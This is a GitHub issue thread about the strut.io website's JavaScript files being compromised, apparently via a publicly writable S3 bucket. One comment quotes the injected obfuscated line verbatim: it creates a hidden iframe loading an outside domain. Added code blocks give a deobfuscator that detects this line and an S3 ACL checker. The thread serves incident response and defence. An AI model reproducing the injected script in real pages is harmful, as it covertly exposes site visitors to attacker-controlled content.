
Comments (15)

jaens avatar jaens commented on August 23, 2024 5

Still compromised... 🔥

from strut.

MohannadNaj avatar MohannadNaj commented on August 23, 2024 1

It's actually one line injected into what appears to be every JS file: require.js, loadPresentation.js, swfobject.js, etc.

This is the content of the injected line:

var _0x75b214=["iframe","setAttribute","https://www.jqwww.download/lot.html","head","appendChild","1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1","start","createElement"];!function(t,x){!function(x){for(;--x;)t.push(t.shift())}(++x)}(_0x75b214,367);var _0x48ae8e=function(t,x){var a=_0x75b214[t-=0];return a};a=document[_0x48ae8e("0x0")](_0x48ae8e("0x1")),a[_0x48ae8e("0x2")]("src",_0x48ae8e("0x3")),a.style.width="0px",a.style.height="1px",document[_0x48ae8e("0x4")][_0x48ae8e("0x5")](a);

I think we should email @tantaman about this. Since it's kinda urgent..

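The injected line above uses a common JavaScript obfuscation scheme: a string table, a push/shift rotation of that table, and an accessor that indexes it with hex strings. The following is an added example, not code from the thread or from the strut project, showing how a defender can recognise that pattern in a JS file, undo the rotation, and recover the indicator (the hidden iframe target) without executing the script. The function names `analyzeInjectedLine` and `scanJsSource` are hypothetical; the sample input is the line quoted in the comment above.

```javascript
// Added example: static detector/deobfuscator for the rotated-string-array
// iframe injection quoted in the thread. Nothing here executes the sample.

// The injected line exactly as quoted above (used here as constructed test input).
const INJECTED_LINE = `var _0x75b214=["iframe","setAttribute","https://www.jqwww.download/lot.html","head","appendChild","1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1","start","createElement"];!function(t,x){!function(x){for(;--x;)t.push(t.shift())}(++x)}(_0x75b214,367);var _0x48ae8e=function(t,x){var a=_0x75b214[t-=0];return a};a=document[_0x48ae8e("0x0")](_0x48ae8e("0x1")),a[_0x48ae8e("0x2")]("src",_0x48ae8e("0x3")),a.style.width="0px",a.style.height="1px",document[_0x48ae8e("0x4")][_0x48ae8e("0x5")](a);`;

// String table of the form: var _0xNAME=["...","...",...]
const STRING_TABLE_RE = /var\s+(_0x[0-9a-f]+)\s*=\s*\[((?:"[^"\\]*",?)+)\]/;
// Accessor calls of the form: _0xNAME("0xN")
const ACCESSOR_RE = /_0x[0-9a-f]+\(\s*"(0x[0-9a-f]+)"\s*\)/g;

function analyzeInjectedLine(src) {
  const table = src.match(STRING_TABLE_RE);
  if (!table) return null; // not this obfuscation family
  const [, arrayName, body] = table;
  const strings = JSON.parse("[" + body + "]");

  // The rotation stub is called as (_0xNAME, N); its inner loop pre-decrements
  // from N+1, so it performs exactly N push(shift()) moves: a left rotation
  // by N mod table length.
  const rot = src.match(new RegExp("\\(" + arrayName + "\\s*,\\s*(\\d+)\\)"));
  const count = rot ? parseInt(rot[1], 10) : 0;
  const rotated = strings.slice();
  for (let i = 0; i < count % rotated.length; i++) rotated.push(rotated.shift());

  // Replace every _0xNAME("0xN") lookup with the string it resolves to.
  const decoded = src.replace(ACCESSOR_RE, (_, hex) =>
    JSON.stringify(rotated[parseInt(hex, 16)]));

  // Indicators a defender wants: is an iframe created, where does it point,
  // and is it sized to be invisible (0px wide / 1px high in the sample).
  const srcMatch = decoded.match(/\(\s*"src"\s*,\s*"([^"]+)"\s*\)/);
  const hidden = /width\s*=\s*"0px"/.test(decoded) || /height\s*=\s*"[01]px"/.test(decoded);
  return {
    arrayName,
    rotation: count % strings.length,
    createsIframe: /"createElement"\]\(\s*"iframe"\s*\)/.test(decoded),
    iframeSrc: srcMatch ? srcMatch[1] : null,
    hiddenIframe: hidden,
    decoded,
  };
}

// Scan the contents of one JS file line by line; returns one finding per
// injected line so the caller can report file/line/target.
function scanJsSource(content) {
  const findings = [];
  content.split(/\r?\n/).forEach((line, i) => {
    const r = analyzeInjectedLine(line);
    if (r && r.createsIframe) {
      findings.push({ line: i + 1, iframeSrc: r.iframeSrc, hidden: r.hiddenIframe });
    }
  });
  return findings;
}

console.log(JSON.stringify(analyzeInjectedLine(INJECTED_LINE), null, 2));
```

Run over every `*.js` served by the site (or stored in the bucket) and compare against a clean checkout: a hit on `createsIframe` with a `hiddenIframe` of `true` and an off-site `iframeSrc` is the signature the thread is describing, and the decoded line tells you the target without loading it.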

tantaman avatar tantaman commented on August 23, 2024 1

This has been resolved as of today.

http://strut.io/editor


tantaman avatar tantaman commented on August 23, 2024

o_O

Any idea how that could have happened?


engineers-tools avatar engineers-tools commented on August 23, 2024

Someone has injected a script onto the *.vendor.js file of your strut.io website. Either someone hacked the file directly or has infected a CDN where you're pulling files from.
The script injects an <iframe> on your index file the first time it loads.


cjmielke avatar cjmielke commented on August 23, 2024

My assumptions have been that the scripts were modified server-side, but I like the alternate theory of a CDN being compromised. Whatever it is, I imagine it's a propagating mechanism that is broadly targeted, and not specific to strut.io.

@tantaman the first step is to see if those files are modified on the server. Let us know.


thebouv avatar thebouv commented on August 23, 2024

Completely unrelated to this repo, but figured I'd drop a note as I found this issue via a search for jqwww.download.

I just helped another open source project with almost exactly the same issue. Their JS files hosted on an AWS S3 bucket were all compromised to include the iframe injection line for jqwww.download as you show above (each page on their site had the iframe injected 6 times!).

Just leaving a note that I too think it is broadly targeted. If you have S3 somehow involved in the setup of the site where these files were, even more interesting.


tantaman avatar tantaman commented on August 23, 2024


thebouv avatar thebouv commented on August 23, 2024

They're in the midst of investigating now actually. I just told him I found it about 2 hours ago. I just happened to be surfing their website when the fan on my MacBook went nuts so I tracked it down to his site (open in a tab) and then started picking his files apart.

Only his JS files and some images are in the S3 bucket; the rest of his site isn't (as far as I know, but I'll double check with him).

So what he's done for now is just kill those js files entirely -- they were only for fontawesome stuff. So he's using the fontawesome CDN now.

But he looked at other JS files he had in same bucket and they too were compromised. I told him to check logs, look for suspicious logins, check read/write permissions on the files/bucket, etc.


refi64 avatar refi64 commented on August 23, 2024

While this is up for discussion, as a random thought: couldn't Strut technically be hosted on GitHub pages, since it's entirely client-side?


cjmielke avatar cjmielke commented on August 23, 2024

I've notified my contacts at Amazon. Wonder if they could grep the whole system ;)


thebouv avatar thebouv commented on August 23, 2024

Another repo potentially related as it mentions AWS as well. Last comment says something about their CDN permissions being set public -- not sure if that has anything to do with it, I'm not a big AWS user.

uBlockOrigin/uAssets#1698

But figured I'd share if it helps your investigation.


cjmielke avatar cjmielke commented on August 23, 2024

I've personally never used S3 before, so this exercise has been rather educational ...

https://www.tripwire.com/state-of-security/security-data-protection/cloud/public-aws-s3-buckets-writable/

I'm really shocked that this is a problem, and that it hasn't been used for things far more nefarious!

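The linked article and the earlier advice to "check read/write permissions on the files/bucket" both come down to one question: does the bucket or object ACL grant WRITE to a public group, and is there a public-access block that makes such a grant inert? The following is an added example, not code from the thread, the strut project or the linked article; it evaluates ACL JSON in the shape returned by `aws s3api get-bucket-acl` / `get-object-acl` together with the configuration returned by `aws s3api get-public-access-block`. The function names `findPublicGrants` and `assessBucket` are hypothetical, and the three sample ACLs are constructed for the example.

```javascript
// Added example: offline check of S3 ACL output for public write grants.
// Input shape matches what `aws s3api get-bucket-acl --bucket NAME` and
// `aws s3api get-public-access-block --bucket NAME` print; no AWS calls here.

// The two predefined groups whose grants make an ACL "public".
const PUBLIC_GROUPS = {
  "http://acs.amazonaws.com/groups/global/AllUsers": "anyone on the internet",
  "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any AWS account",
};
// Permissions that let the grantee change content or the ACL itself.
const WRITE_PERMS = new Set(["WRITE", "WRITE_ACP", "FULL_CONTROL"]);

// Returns one entry per grant made to a public group.
function findPublicGrants(acl) {
  const findings = [];
  for (const g of acl.Grants || []) {
    const grantee = g.Grantee || {};
    const who = grantee.Type === "Group" ? PUBLIC_GROUPS[grantee.URI] : undefined;
    if (!who) continue; // canonical-user / account grants are not "public"
    findings.push({ who, permission: g.Permission, canWrite: WRITE_PERMS.has(g.Permission) });
  }
  return findings;
}

// Combines the ACL findings with the bucket's PublicAccessBlock. With
// IgnorePublicAcls set, S3 ignores public ACL grants on the bucket and its
// objects, so a public grant is reported but not rated as exposed.
function assessBucket(name, acl, publicAccessBlock) {
  const grants = findPublicGrants(acl);
  const pab = (publicAccessBlock && publicAccessBlock.PublicAccessBlockConfiguration) || {};
  const aclsIgnored = pab.IgnorePublicAcls === true;
  const writable = grants.some((g) => g.canWrite);
  const readable = grants.length > 0;
  let verdict = "private";
  if (readable && !aclsIgnored) verdict = "public-read";
  if (writable && !aclsIgnored) verdict = "public-write"; // anyone can replace your JS
  return {
    bucket: name,
    verdict,
    publicGrants: grants,
    publicAclsIgnored: aclsIgnored,
    recommendation:
      verdict === "public-write"
        ? "remove the public WRITE/WRITE_ACP/FULL_CONTROL grant, enable BlockPublicAcls and IgnorePublicAcls, then re-verify file contents against a clean copy"
        : verdict === "public-read"
        ? "confirm public read is intended; serve static assets through a CDN origin rather than a world-readable bucket if not"
        : "no public ACL exposure via grants",
  };
}

// Constructed samples in the CLI's output shape (not real buckets).
const OWNER = { DisplayName: "site-owner", ID: "EXAMPLE-CANONICAL-ID" };
const ACL_WRITABLE = {
  Owner: OWNER,
  Grants: [
    { Grantee: { Type: "CanonicalUser", ID: "EXAMPLE-CANONICAL-ID" }, Permission: "FULL_CONTROL" },
    { Grantee: { Type: "Group", URI: "http://acs.amazonaws.com/groups/global/AllUsers" }, Permission: "READ" },
    { Grantee: { Type: "Group", URI: "http://acs.amazonaws.com/groups/global/AllUsers" }, Permission: "WRITE" },
  ],
};
const ACL_READ_ONLY = {
  Owner: OWNER,
  Grants: [
    { Grantee: { Type: "CanonicalUser", ID: "EXAMPLE-CANONICAL-ID" }, Permission: "FULL_CONTROL" },
    { Grantee: { Type: "Group", URI: "http://acs.amazonaws.com/groups/global/AllUsers" }, Permission: "READ" },
  ],
};
const ACL_PRIVATE = {
  Owner: OWNER,
  Grants: [{ Grantee: { Type: "CanonicalUser", ID: "EXAMPLE-CANONICAL-ID" }, Permission: "FULL_CONTROL" }],
};
const PAB_STRICT = {
  PublicAccessBlockConfiguration: {
    BlockPublicAcls: true, IgnorePublicAcls: true, BlockPublicPolicy: true, RestrictPublicBuckets: true,
  },
};

for (const [name, acl, pab] of [
  ["assets-writable", ACL_WRITABLE, null],
  ["assets-read", ACL_READ_ONLY, null],
  ["assets-locked", ACL_WRITABLE, PAB_STRICT],
  ["assets-private", ACL_PRIVATE, null],
]) {
  console.log(JSON.stringify(assessBucket(name, acl, pab)));
}
```

Object ACLs can differ from the bucket ACL, so in an incident like this one you would run the same check over `get-object-acl` output for every JS object, not just the bucket; a bucket policy can grant public access independently of ACLs and needs its own review.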

smalltimebloke avatar smalltimebloke commented on August 23, 2024

Hi there. The problem isn't resolved yet.


ejvindh avatar ejvindh commented on August 23, 2024

#387 (comment)
